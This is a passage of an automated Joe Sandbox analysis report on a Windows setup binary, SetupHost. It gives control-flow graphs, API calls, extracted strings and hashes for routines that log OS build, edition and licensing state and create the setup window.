                                                                                                                                                                                                                • String ID: FALSE$SYSTEM\Setup\MoSetup\Volatile$SetupUI: Button click detected - calling registered callback...$SetupUI: Button click detected - no registered callback.$SetupUI: Calling ShutdownBlockReasonCreate...$SetupUI: Calling ShutdownBlockReasonDestroy...$SetupUI: Calling registered callback...$SetupUI: Got a message for session state change$SetupUI: Got a message from Store$SetupUI: Got a timer message$SetupUI: Logging EndSession [0x%X] notification...$SetupUI: No registered callback.$SetupUI: Posting Quit Message...$SetupUI: Returning %s to QueryEndSession [0x%X] request...$SetupUI: ShutdownBlockReasonCreate failed! Error: 0x%X$SetupUI: ShutdownBlockReasonCreate succeeded!$SetupUI: ShutdownBlockReasonDestroy failed! Error: 0x%X$SetupUI: ShutdownBlockReasonDestroy succeeded!$TRUE
                                                                                                                                                                                                                • API String ID: 2660305463-3359713709
                                                                                                                                                                                                                • Opcode ID: 7efc0575982cb0c40dbb9a299b5371e0fdabceff497ad46bd4dfa4a16fa146d4
                                                                                                                                                                                                                • Instruction ID: d751c85027e3fa39906774049cc8df25d5cfd439269da7b57020886045f2764f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7efc0575982cb0c40dbb9a299b5371e0fdabceff497ad46bd4dfa4a16fa146d4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5E1B2B5704511ABCB05ABA8CC9DA7EFB69EF897207098406EC0697391DF34ED12CBD1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 966 9ac756-9ac7fb call a0f3e6 call 9fda8f memset call 9be9f7 call 9b8af9 975 9ac83f-9ac85e call 9bf51a call 9b8af9 966->975 976 9ac7fd-9ac817 GetLastError call 9b9d6c 966->976 985 9ac87b-9ac887 975->985 986 9ac860-9ac879 975->986 981 9ac81a-9ac82b 976->981 990 9ac831-9ac83a call 9b8ab5 981->990 995 9ac889-9ac8a8 call 9b8a19 985->995 996 9ac8b0-9ac8c3 call 9fde32 985->996 986->990 998 9acb1d-9acb2a call 9b9d9c 990->998 1017 9ac8ad 995->1017 1003 9ac8d4-9ac8e8 call 9fd721 996->1003 1004 9ac8c5-9ac8cf 996->1004 1005 9acb3a-9acb5f call 9aee5d * 2 call a0f3a4 998->1005 1006 9acb2c-9acb33 call 9b9b21 998->1006 1014 9ac8ea-9ac8f6 1003->1014 1015 9ac92f-9ac93b 1003->1015 1004->981 1006->1005 1026 9ac95e-9ac971 1014->1026 1028 9ac8f8-9ac904 1014->1028 1015->1026 1027 9ac93d-9ac956 call 9b8a19 1015->1027 1017->996 1037 9ac9ce-9ac9e1 1026->1037 1038 9ac973-9ac97c 1026->1038 1040 9ac95b 1027->1040 1029 9ac90b-9ac92d call 9b8a19 1028->1029 1030 9ac906 1028->1030 1029->1026 1030->1029 1054 9aca0e-9aca21 1037->1054 1055 9ac9e3-9aca06 GetSystemDefaultUILanguage call 9b8a19 1037->1055 1042 9ac97e-9ac983 1038->1042 1043 9ac985-9ac988 1038->1043 1040->1026 1046 9ac9ac-9ac9c6 call 9b8a19 1042->1046 1047 9ac98a-9ac98f 1043->1047 1048 9ac991-9ac994 1043->1048 1060 9ac9cb 1046->1060 1047->1046 1049 9ac99d-9ac9a5 1048->1049 1050 9ac996-9ac99b 1048->1050 1049->1046 1053 9ac9a7 1049->1053 1050->1046 1053->1046 1063 9aca4e-9aca61 1054->1063 1064 9aca23-9aca46 GetUserDefaultUILanguage call 9b8a19 1054->1064 1066 9aca0b 1055->1066 1060->1037 1071 9aca8b-9aca9e 1063->1071 1072 9aca63-9aca83 call 9b8a19 1063->1072 1074 9aca4b 1064->1074 1066->1054 1080 9acad3-9acaf2 call 9bb583 1071->1080 1081 9acaa0-9acacb call 9b8a19 1071->1081 1083 9aca88 1072->1083 1074->1063 1086 9acb60-9acb6c 1080->1086 1087 9acaf4-9acb0c call 9b8ab5 1080->1087 1092 9acad0 1081->1092 1083->1071 1095 9acb6e-9acb8e call 9b8a19 1086->1095 1096 9acb11 1086->1096 1087->1096 1092->1080 1102 9acb93-9acb96 1095->1102 1098 9acb17 1096->1098 1098->998 1102->1098
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 009AC760
                                                                                                                                                                                                                • memset.MSVCRT ref: 009AC7CC
                                                                                                                                                                                                                  • Part of subcall function 009BE9F7: memset.MSVCRT ref: 009BEA20
                                                                                                                                                                                                                  • Part of subcall function 009BE9F7: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 009BEA37
                                                                                                                                                                                                                  • Part of subcall function 009BE9F7: GetLastError.KERNEL32(?,00000000), ref: 009BEA52
                                                                                                                                                                                                                  • Part of subcall function 009BE9F7: SetLastError.KERNEL32(00000000,?,00000000), ref: 009BEA62
                                                                                                                                                                                                                  • Part of subcall function 009B8AF9: GetProcessHeap.KERNEL32(00000000,?,?,?,009BB826,?,?,?,00000000), ref: 009B8B0A
                                                                                                                                                                                                                  • Part of subcall function 009B8AF9: HeapFree.KERNEL32(00000000,?,009BB826), ref: 009B8B11
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 009AC7FD
                                                                                                                                                                                                                • GetSystemDefaultUILanguage.KERNEL32(?,?,00000000,00000000), ref: 009AC9E3
                                                                                                                                                                                                                • GetUserDefaultUILanguage.KERNEL32(?,?,00000000,00000000), ref: 009ACA23
                                                                                                                                                                                                                  • Part of subcall function 009B8A19: __EH_prolog3.LIBCMT ref: 009B8A20
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$DefaultHeapLanguagememset$FileFreeH_prolog3H_prolog3_ModuleNameProcessSystemUser
                                                                                                                                                                                                                • String ID: Host OS Architecture [ %s ]$ Host OS Build String [ %s ]$ Host OS Edition [ %s ]$ Host OS Language Id [ %d ]$ Host OS License State [ %s ]$ Host OS License State [ UNAVAILABLE ]$ Host OS Version [ %d.%d.%d ]$ User UI Language Id [ %d ]$CSetupHost::LogBuildInfo$Genuine$Not-Genuine$SetupHost: Setup build version is: %s$Unknown$arm$arm64$x64$x86
                                                                                                                                                                                                                • API String ID: 1568751597-578167857
                                                                                                                                                                                                                • Opcode ID: 9187baf62e207c45f42d1e50d7684f0d092e685caba16e68a58123dea59542de
                                                                                                                                                                                                                • Instruction ID: 89720173c0371469339123b3543997623811d4232a9f7c25194ede6c6f684672
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9187baf62e207c45f42d1e50d7684f0d092e685caba16e68a58123dea59542de
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74C185B4B006248BCF14EB648C59B6EB7B5FF85710F04859AE846AB395CE749D02CFE1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1103 9fd77d-9fd7b2 call a0f3b3 1106 9fd7c5-9fd7d9 LoadLibraryExW 1103->1106 1107 9fd7b4 1103->1107 1109 9fd7ec-9fd7fc GetProcAddress 1106->1109 1110 9fd7db-9fd7ea GetLastError call 9b9d6c 1106->1110 1108 9fd7b9-9fd7c0 call 9b9d84 1107->1108 1121 9fd9a8-9fd9ac 1108->1121 1113 9fd7fe-9fd80d GetLastError call 9b9d6c 1109->1113 1114 9fd812-9fd823 GetProcAddress 1109->1114 1110->1108 1122 9fd99e-9fd9a0 call 9b9d84 1113->1122 1114->1113 1116 9fd825-9fd836 GetProcAddress 1114->1116 1116->1113 1120 9fd838-9fd849 GetProcAddress 1116->1120 1120->1113 1125 9fd84b-9fd85c GetProcAddress 1120->1125 1123 9fd9ae-9fd9b9 1121->1123 1124 9fd9bb-9fd9c6 call 9b9d9c 1121->1124 1129 9fd9a5 1122->1129 1123->1124 1133 9fd9c8-9fd9d1 LocalFree 1124->1133 1134 9fd9d5-9fd9d9 1124->1134 1125->1113 1127 9fd85e-9fd86a 1125->1127 1137 9fd86c-9fd870 1127->1137 1129->1121 1133->1134 1135 9fd9db-9fd9e4 LocalFree 1134->1135 1136 9fd9e8-9fd9ec 1134->1136 1135->1136 1138 9fd9ee-9fd9f7 LocalFree 1136->1138 1139 9fd9fb-9fda01 1136->1139 1137->1122 1142 9fd876-9fd89b 1137->1142 1138->1139 1140 9fda0a-9fda15 call a0f390 1139->1140 1141 9fda03-9fda04 FreeLibrary 1139->1141 1141->1140 1142->1122 1147 9fd8a1-9fd8a9 1142->1147 1148 9fd8af-9fd8b1 1147->1148 1149 9fd999 1147->1149 1150 9fd8b4-9fd8bd 1148->1150 1149->1122 1151 9fd8bf-9fd8c8 LocalFree 1150->1151 1152 9fd8cc-9fd8f3 1150->1152 1151->1152 1155 9fd928-9fd92c 1152->1155 1156 9fd8f5-9fd8f9 1152->1156 1159 9fd92e-9fd937 LocalFree 1155->1159 1160 9fd93b-9fd95d 1155->1160 1157 9fd8ff 1156->1157 1158 9fd981 1156->1158 1162 9fd902-9fd915 1157->1162 1161 9fd983 call 9b9d84 1158->1161 1159->1160 1160->1157 1170 9fd95f-9fd963 1160->1170 1166 9fd988-9fd98b 1161->1166 1162->1150 1165 9fd917-9fd919 1162->1165 1167 9fd91b-9fd926 1165->1167 1168 9fd996 1165->1168 1166->1129 1167->1166 1168->1149 1170->1158 1171 9fd965-9fd969 1170->1171 1171->1157 1172 9fd96b-9fd96f 1171->1172 1173 9fd98d-9fd994 1172->1173 1174 9fd971-9fd97f 1172->1174 1173->1161 1174->1162
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009FD784
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(SLC.DLL,00000000,00000000,0000006C,009FD74D,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 009FD7CC
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 009FD7DB
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SLOpen,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009FD7F2
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 009FD7FE
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SLClose,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009FD818
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SLGetLicensingStatusInformation,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009FD82B
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SLGetProductSkuInformation,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009FD83E
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SLGetSLIDList,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009FD851
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 009FD8C2
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 009FD9CB
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 009FD9DE
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 009FD9F1
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 009FDA04
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressFreeProc$Local$ErrorLastLibrary$H_prolog3Load
                                                                                                                                                                                                                • String ID: DependsOn$SLC.DLL$SLClose$SLGetLicensingStatusInformation$SLGetProductSkuInformation$SLGetSLIDList$SLOpen
                                                                                                                                                                                                                • API String ID: 2218164828-1438759880
                                                                                                                                                                                                                • Opcode ID: 8589fcd50b7683eed68e8aa54157ed0f55891231cf972c6929eb156e4ed14772
                                                                                                                                                                                                                • Instruction ID: cfa717bc29b307b6215744a842a498dc6a36f984d062436193058e7a693bab6f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8589fcd50b7683eed68e8aa54157ed0f55891231cf972c6929eb156e4ed14772
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78813A71A0220E9BDF159FE5DC497FEBBBABF88315F144029E601B7290CBB58942CB51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1175 9a7be5-9a7c13 call a0f3b3 call 9b9c14 1180 9a7c41-9a7c5c LoadImageW 1175->1180 1181 9a7c15-9a7c1c 1175->1181 1183 9a7c7a-9a7cc2 LoadCursorW RegisterClassW 1180->1183 1184 9a7c5e-9a7c78 GetLastError call 9b9d6c 1180->1184 1182 9a7c1f-9a7c3c call 9b8ab5 1181->1182 1202 9a7d12-9a7d14 1182->1202 1186 9a7d37-9a7d4a 1183->1186 1187 9a7cc4-9a7ccf GetLastError 1183->1187 1184->1182 1199 9a7d4c-9a7d6a call 9b8a19 1186->1199 1200 9a7d6d-9a7d8d CreateWindowExW 1186->1200 1187->1186 1190 9a7cd1-9a7ce3 GetLastError call 9b9d53 1187->1190 1190->1186 1195 9a7ce5-9a7d0a call 9b8ab5 1190->1195 1224 9a7d0f 1195->1224 1199->1200 1203 9a7d8f-9a7d9c GetLastError call 9b9d6c 1200->1203 1204 9a7da6-9a7db8 ChangeWindowMessageFilterEx 1200->1204 1208 9a7d1d-9a7d26 call 9b9d9c 1202->1208 1209 9a7d16-9a7d18 call 9a7e94 1202->1209 1203->1204 1206 9a7dba-9a7dc7 GetLastError call 9b9d6c 1204->1206 1207 9a7dd1-9a7de6 SetTimer 1204->1207 1206->1207 1214 9a7de8-9a7df5 GetLastError call 9b9d6c 1207->1214 1215 9a7dff-9a7e0e call 9b8822 1207->1215 1227 9a7d28-9a7d2a call 9b9b21 1208->1227 1228 9a7d2f-9a7d36 call a0f390 1208->1228 1209->1208 1214->1215 1231 9a7e1a-9a7e2c UpdateWindow 1215->1231 1232 9a7e10 1215->1232 1224->1202 1227->1228 1236 9a7e2e-9a7e3b GetLastError call 9b9d6c 1231->1236 1237 9a7e45-9a7e67 ShowWindow SetWindowLongW GetWindowLongW 1231->1237 1232->1231 1236->1237 1237->1224 1239 9a7e6d-9a7e88 1237->1239
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Window$Load$ChangeClassCreateCursorFilterH_prolog3ImageMessageRegisterTimerUpdate
                                                                                                                                                                                                                • String ID: CSystemHelper::CreateMainWindow$SYSTEM\Setup\MoSetup\Volatile$SetupUI: Creating main window...${6c104913-738b-4411-a4ec-8b594e314f6b}
                                                                                                                                                                                                                • API String ID: 1906055104-1803576973
                                                                                                                                                                                                                • Opcode ID: 5fa6536b592f6a91048db0f2b0212e2c87289811224a69c5d2d69803ec013cf2
                                                                                                                                                                                                                • Instruction ID: 1f2f6df93f36be64d26520b3bb4caaf1cc4b6fd24180d3a94ed6db374073f50b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fa6536b592f6a91048db0f2b0212e2c87289811224a69c5d2d69803ec013cf2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 967162707042009BDF14AFF49D4ABBEB7BAAFC5710F149419F902AB3D1DB7498028B91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1243 a0d5fc-a0d639 call a0f3e6 1246 a0d645-a0d680 memset RtlGetVersion call 9b9ca1 1243->1246 1247 a0d63b-a0d640 1243->1247 1253 a0d682-a0d688 1246->1253 1254 a0d68d-a0d694 1246->1254 1248 a0d88f-a0d891 call 9b9d84 1247->1248 1252 a0d896-a0d8a9 call 9b9d9c 1248->1252 1264 a0d8b2-a0d8bb 1252->1264 1265 a0d8ab-a0d8ad call 9b9b21 1252->1265 1253->1248 1256 a0d7e1-a0d7e8 1254->1256 1257 a0d69a-a0d6ac call 9bb1d4 1254->1257 1258 a0d88a 1256->1258 1259 a0d7ee-a0d7f5 1256->1259 1266 a0d6b1-a0d6b5 1257->1266 1258->1248 1262 a0d844-a0d84b 1259->1262 1263 a0d7f7-a0d7fb 1259->1263 1262->1258 1269 a0d84d-a0d85a 1262->1269 1270 a0d6f1 1263->1270 1271 a0d801-a0d80b 1263->1271 1267 a0d8c4-a0d8cd 1264->1267 1268 a0d8bd-a0d8bf call 9b9b21 1264->1268 1265->1264 1273 a0d6b7-a0d6c4 call 9b9d84 1266->1273 1274 a0d6c9-a0d6eb CompareStringW 1266->1274 1277 a0d8d6-a0d8e5 1267->1277 1278 a0d8cf-a0d8d1 call 9b9b21 1267->1278 1268->1267 1279 a0d860-a0d865 1269->1279 1280 a0d6f7 1269->1280 1270->1280 1282 a0d817-a0d81b 1271->1282 1283 a0d80d-a0d812 1271->1283 1273->1252 1274->1270 1281 a0d77c-a0d795 CompareStringW 1274->1281 1289 a0d8e7 call 9b9b21 1277->1289 1290 a0d8ec-a0d8f7 call a0f3a4 1277->1290 1278->1277 1288 a0d6fc-a0d705 call 9b9c14 1279->1288 1280->1288 1285 a0d7a7-a0d7c0 CompareStringW 1281->1285 1286 a0d797-a0d7a2 1281->1286 1291 a0d827-a0d82e 1282->1291 1292 a0d81d-a0d822 1282->1292 1283->1288 1293 a0d7d2-a0d7dc 1285->1293 1294 a0d7c2-a0d7cd 1285->1294 1286->1288 1288->1248 1300 a0d70b-a0d711 call a0d460 1288->1300 1289->1290 1298 a0d830-a0d835 1291->1298 1299 a0d83a-a0d83f 1291->1299 1292->1288 1293->1300 1294->1288 1298->1288 1299->1288 1304 a0d716-a0d71a 1300->1304 1304->1248 1305 a0d720-a0d740 CompareStringW 1304->1305 1306 a0d872-a0d878 1305->1306 1307 a0d746-a0d764 call 9a1bc9 1305->1307 1308 a0d87e-a0d888 1306->1308 1311 a0d86a-a0d870 1307->1311 1312 a0d76a-a0d777 call 9b9d84 1307->1312 1308->1252 1311->1308 1312->1252
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3_Versionmemset
                                                                                                                                                                                                                • String ID: %sCore$Business$BusinessN$EditionId$HomePremium$Professional$ProfessionalN$Server Core$ServerComputeCluster$ServerDatacenter$ServerEnterprise$ServerHPC$ServerStandard$ServerWeb$Software\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                • API String ID: 1577575235-3437204702
                                                                                                                                                                                                                • Opcode ID: 14ed0750d1eadbdd73915ee0c6927c3de03772f412fc33ff4466f253fdff5c02
                                                                                                                                                                                                                • Instruction ID: 38652009d11a9b0c7f14479355ae2265d45cfc017fc87cb366f04bf41e07f2d0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14ed0750d1eadbdd73915ee0c6927c3de03772f412fc33ff4466f253fdff5c02
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2561E771A1531D9BDF249BE8AD95BED76B5AF84324F0041A8F6097B2C1DBB09E84CF40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1315 a0d8f8-a0d918 call a0f3b3 1318 a0d91a 1315->1318 1319 a0d92b-a0d937 call a0d460 1315->1319 1321 a0d91f-a0d926 call 9b9d84 1318->1321 1324 a0d948-a0d967 CompareStringW 1319->1324 1325 a0d939-a0d943 call 9b9d84 1319->1325 1330 a0da5e-a0da6b call 9b9d9c 1321->1330 1328 a0daa5-a0dabe CompareStringW 1324->1328 1329 a0d96d-a0d970 call a0d5fc 1324->1329 1325->1330 1332 a0dac4-a0dae0 CompareStringW 1328->1332 1333 a0da3b 1328->1333 1339 a0d975-a0d979 1329->1339 1344 a0da74-a0da80 1330->1344 1345 a0da6d-a0da6f call 9b9b21 1330->1345 1337 a0dae2-a0dae7 1332->1337 1338 a0daec-a0daf1 1332->1338 1336 a0da40 1333->1336 1341 a0da43-a0da4c call 9b9c14 1336->1341 1337->1341 1338->1341 1342 a0d98a-a0d9a9 CompareStringW 1339->1342 1343 a0d97b-a0d985 call 9b9d84 1339->1343 1341->1321 1360 a0da52-a0da5c 1341->1360 1342->1333 1349 a0d9af-a0d9c8 CompareStringW 1342->1349 1343->1330 1350 a0da82 call 9b9b21 1344->1350 1351 a0da87-a0da90 1344->1351 1345->1344 1349->1333 1356 a0d9ca-a0d9e3 CompareStringW 1349->1356 1350->1351 1352 a0da92-a0da94 call 9b9b21 1351->1352 1353 a0da99-a0daa4 call a0f390 1351->1353 1352->1353 1356->1333 1361 a0d9e5-a0d9fe CompareStringW 1356->1361 1360->1330 1361->1333 1362 a0da00-a0da19 CompareStringW 1361->1362 1362->1333 1364 a0da1b-a0da39 CompareStringW 1362->1364 1364->1333 1364->1336
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00A0D8FF
                                                                                                                                                                                                                • CompareStringW.KERNEL32(00000409,00000001,00000000,00000000,Server Core,00000000), ref: 00A0DAB4
                                                                                                                                                                                                                • CompareStringW.KERNEL32(00000409,00000001,00000000,00000000,Server,00000000), ref: 00A0DAD3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CompareString$H_prolog3
                                                                                                                                                                                                                • String ID: Client$Complete$Core$HomeBasic$HomeBasicN$HomePremium$HomePremiumN$Server$Server Core$Starter$StarterN$Unknown
                                                                                                                                                                                                                • API String ID: 2184196538-3738757907
                                                                                                                                                                                                                • Opcode ID: 3088c29f4fbf184bc6e68a428b761ed4b493a21f3b4420b021c123b87ead4d55
                                                                                                                                                                                                                • Instruction ID: 30e0889c6b8b92b1ffe27d936fbcc8293ac94d74b3b54cd8b339e9481cd9338a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3088c29f4fbf184bc6e68a428b761ed4b493a21f3b4420b021c123b87ead4d55
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF51957179821D6AEF14ABE89D9AFFE3A39EB917A8F004514B2017B1D1DAF18D018760
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1365 9aaa1d-9aaa56 call a0f3b3 1368 9aaa58 1365->1368 1369 9aaa8c-9aaa90 1365->1369 1370 9aaa5d-9aaa87 call 9b8ab5 1368->1370 1371 9aaa99-9aaa9d 1369->1371 1372 9aaa92-9aaa97 1369->1372 1406 9aaf6d 1370->1406 1373 9aaa9f-9aaaa4 1371->1373 1374 9aaaa6-9aaaae 1371->1374 1372->1370 1373->1370 1376 9aab4d-9aab55 1374->1376 1377 9aaab4-9aaacb call 9a1bc9 1374->1377 1378 9aab57-9aab59 1376->1378 1379 9aabd4-9aabdc 1376->1379 1394 9aaafc-9aab14 call 9aa87f 1377->1394 1395 9aaacd-9aaad4 1377->1395 1382 9aab5b-9aab66 call 9b9b21 1378->1382 1383 9aab6c-9aab83 call 9a1bc9 1378->1383 1384 9aabde-9aabe0 1379->1384 1385 9aac56-9aac5f 1379->1385 1382->1383 1410 9aab94-9aabab call 9aa87f 1383->1410 1411 9aab85 1383->1411 1389 9aabe2-9aabed call 9b9b21 1384->1389 1390 9aabf3-9aac0a call 9a1bc9 1384->1390 1392 9aad1f 1385->1392 1393 9aac65-9aac68 1385->1393 1389->1390 1424 9aac0c-9aac11 1390->1424 1425 9aac16-9aac2d call 9aa87f 1390->1425 1399 9aad24-9aad38 call 9aa87f 1392->1399 1403 9aad18-9aad1d 1393->1403 1404 9aac6e-9aac72 1393->1404 1418 9aab43-9aab4a 1394->1418 1419 9aab16 1394->1419 1396 9aaad7-9aaaf7 call 9b8ab5 1395->1396 1416 9aaf70-9aaf7c call 9b9d9c 1396->1416 1428 9aad3a 1399->1428 1429 9aad44-9aad50 1399->1429 1403->1399 1412 9aac78-9aac7b 1404->1412 1413 9aad11-9aad16 1404->1413 1406->1416 1434 9aabad-9aabb2 1410->1434 1435 9aabb7-9aabc3 1410->1435 1420 9aab8a-9aab8f 1411->1420 1421 9aad0a-9aad0f 1412->1421 1422 9aac81-9aac84 1412->1422 1413->1399 1449 9aaf7e-9aaf80 call 9b9b21 1416->1449 1450 9aaf85-9aaf8a 1416->1450 1418->1376 1430 9aab1b-9aab3e call 9b8ab5 1419->1430 1420->1396 1421->1399 1431 9aad03-9aad08 1422->1431 1432 9aac86-9aac8a 1422->1432 1424->1420 1445 9aac39-9aac45 1425->1445 1446 9aac2f 1425->1446 1428->1429 1439 9aad5c-9aad61 1429->1439 1440 9aad52-9aad59 call 9b9b21 1429->1440 1430->1416 1431->1399 1441 9aacfc-9aad01 1432->1441 1442 9aac8c-9aaca0 1432->1442 1434->1430 1443 9aabcf-9aabd1 1435->1443 1444 9aabc5-9aabcc call 9b9b21 1435->1444 1447 9aacca-9aacd2 1439->1447 1440->1439 1441->1399 1491 9aaca2-9aacbf call 9b8a19 1442->1491 1492 9aacc7 1442->1492 1443->1379 1444->1443 1456 9aac51-9aac53 1445->1456 1457 9aac47-9aac4e call 9b9b21 1445->1457 1446->1445 1459 9aacd8-9aacf0 call 9aa87f 1447->1459 1460 9aad89-9aad8b 1447->1460 1449->1450 1462 9aaf8c call 9b9b21 1450->1462 1463 